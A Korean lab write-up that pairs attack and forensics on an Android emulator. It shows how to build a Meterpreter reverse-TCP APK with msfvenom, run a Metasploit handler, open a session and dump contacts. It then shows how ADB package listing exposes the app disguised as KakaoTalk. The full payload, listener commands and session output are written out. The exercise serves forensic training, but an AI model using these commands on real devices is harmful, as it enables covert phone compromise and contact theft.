로그인

# 4 안드로이드 해킹

작성: 2026.08.06 08:45 최근 수정: 2026.08.07 00:48
[ 종합 침해사고 보고서 ] 
안드로이드 악성 페이로드 침투 및 포렌식 추적 실습

개요  및 실습 목적 
공격자( 해커 ) 관점에서 안드로이드 리버스 셸로 페이로드를 생성·전달하여 타겟 디바이스의 개인정보를 탈취하는 과정을 검증하고, 수사관( 짭새 ) 관점에서 위장된 악성 앱을 추적·특정하는 기법을 정립하기 위해 수행 한다 
────────────────
통합 실습 및 포렌식 비슷한 환경 만들고 해보기 

공격자 환경 : Kali (NAT 모드, TCP 4444 포트포워딩 매핑)

타겟 환경 (Target): Nox Player 에뮬레이터 (Android 12, x86_64)

네트워크 매핑 : 칼리 내부 IP: 10.0.2.15

바인딩/매핑 IP (LHOST): 192.168.0.215

수신 포트 (LPORT): 4444

공유 폴더 경로: /media/sf_ (호스트 윈도우 - 가상머신 간 매개 경로)

분석 도구: ADB
────────────────
공격 및 정보 탈취 수행 과정

→ 악성 페이로드(APK) 생성
→ msfvenom 도구를 활용하여 역방향 TCP 연결을 시도하는 안드로이드 설치 파일(sexy.apk)을 빌드 한다 
┗  msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.215 LPORT=4444 -o sexy.apk
────────────────
◈ 핵심 패러미터 및 팩트 ◈
-p android/meterpreter/reverse_tcp: 안드로이드 환경용 Meterpreter 리버스 TCP 스테이지 페이로드 지정.

LHOST=192.168.0.215: 타겟 기기가 역방향으로 접속할 공격자의 포트포워딩 외부 IP.

LPORT=4444: 리버스 세션을 수신할 공격자 바인딩 포트.
────────────────
공유 폴더를 통한 페이로드 전달 및 유포

생성된 APK 파일을 호스트 PC 및 Nox Player로 전달하기 위해
가상머신의 공유 폴더 디렉토리(/media/sf_)로 이동시킨다

# 1. /media 디렉토리 이동 및 파일 확인
cd /media
ls
# [출력] sexy.apk sf_

# 2. 공유 폴더로 파일 이동
sudo mv sexy.apk sf_/

# 3. 공유 폴더 진입 및 파일 교차 검증
cd sf_
ls
# [출력] mail서버로그 sexy.apk 레지스트리 레지스트리로그 이벤트로그 포렌식
────────────────
Metasploit 핸들러 리스너 대기 및 세션 수립

공격자 칼리 리눅스에서 들어오는 역접속 요청을 수신하기 위해 msfconsole 리스너를 동작 

# Metasploit 실행 (정적 모드)
┗ msfconsole -q

# 핸들러 설정 및 수신 대기
┗ use exploit/multi/handler
┗ set payload android/meterpreter/reverse_tcp
┗ set LHOST 192.168.0.205
┗ set LPORT 4444
┗ run

 [세션 연결 로그]
Plaintext
┗ [*] Started reverse TCP handler on 0.0.0.0:4444 
┗ [*] Sending stage (72530 bytes) to 192.168.0.215
┗ [*] Meterpreter session 1 opened (10.0.2.15:4444 -> 192.168.0.215:61022) at 2026-08-06 02:28:55 -0400
────────────────
주소록 데이터 덤프 및 탈취수립된 Meterpreter 세션을 
이용하여 타겟 단말기 내부 주소록 을 무단 추출

┗ Plaintextmeterpreter > dump_contacts

[*] Fetching 3 contacts into list
[*] Contacts list saved to: contacts_dump_20260806023040.txt

◈ 탈취된 연락처 데이터 검증 ◈ 
┗ cat contacts_dump_20260806023040.txt

메타 데이터 

# 추출 일시: 2026-08-06 02:30:40.336443272 -0400

# 타겟 OS: Android 12 - Linux 5.4.40 (x86_64)

# 원격 타겟 IP/Port: 192.168.0.215:61022

▶ 김옥찌 010-5959-4848 단축 번호 형태 (피해자 본인 계정)
▶ 빵빵이 010-1234-5678 표준 휴대전화 번호
────────────────
분석 시나리오 

피해자 '김옥찌' 는 주소록 유출로 인한 무차별 스팸 전화 폭주 피해를 입어서 미치겠음 
단말기에는 90여 개의 앱이 깔려있었고, 악성 앱은 예:) ' 카카오톡 ' / 이상한 어플 이라는 정상 앱 이름으로 겉모습을 완벽히 위장하고 있어 눈으로 식별하는 것이 불가능 한 상황 일반인 또는 아니면 이미 모르고있는 경우가 엄청 많음 
────────────────
ADB 덤프를 통한 증거

◈ ADB 통신 채널 수립 ◈
D:\platform-tools> adb connect 127.0.0.1:62026
connected to 127.0.0.1:62026

◈ 단말기 셸 진입 및 전체 패키지 리스트 덤프◈ 
D:\platform-tools> adb shell
x1q:/ # cd /data/local/tmp
x1q:/data/local/tmp # pm list packages > 1.txt

◈ 덤프 파일 PC로 인출 ◈ 
D:\platform-tools> adb pull /data/local/tmp/1.txt
/data/local/tmp/1.txt: 1 file pulled. 0.5 MB/s (3381 bytes in 0.006s)
────────────────
위장 앱의 분석 

공격자가 앱 이름 및 아이콘을 '카카오톡'으로 100% 동일하게 위장하더라도, 안드로이드 OS의 고유 식별자인 패키지명 com.metasploit.stage는 공식 패키지명인 com.kakao.talk과 절대로 동일해질 수 없다는 점을 이용하여 악성 앱을 정밀 특정했다 

카카오톡 카메라'로 위장했음에도 불필요한 READ_CONTACTS(주소록 접근) 권한을 백그라운드에서 활용한 점을 입증

C2 통신 및 탈취 행위

com.metasploit.stage 패키지 실행 직후 공격자 IP/Port(192.168.0.215:4444)로 세션이 연결되었으며
해당 세션을 통해 contacts_dump.txt가 유출된 인과관계를 완벽히 검증했다

종합 결론

공격 입증: msfvenom 기반 페이로드(sexy.apk)가 정상 앱으로 위장되어 피해자 단말기 내 설치되었고, 
Reverse TCP 접속을 통해 내부 주소록 3건을 100% 무단 탈취

마지막으로 더 할수있지만 시간이 너무 촉박 하다 더 디테일 하게끔 볼수있는건 따로 시간 맞을때 해본다 
이 노트는 로그인하지 않아도 열람할 수 있습니다. 작성·수정·삭제는 관리자 로그인 후 가능합니다.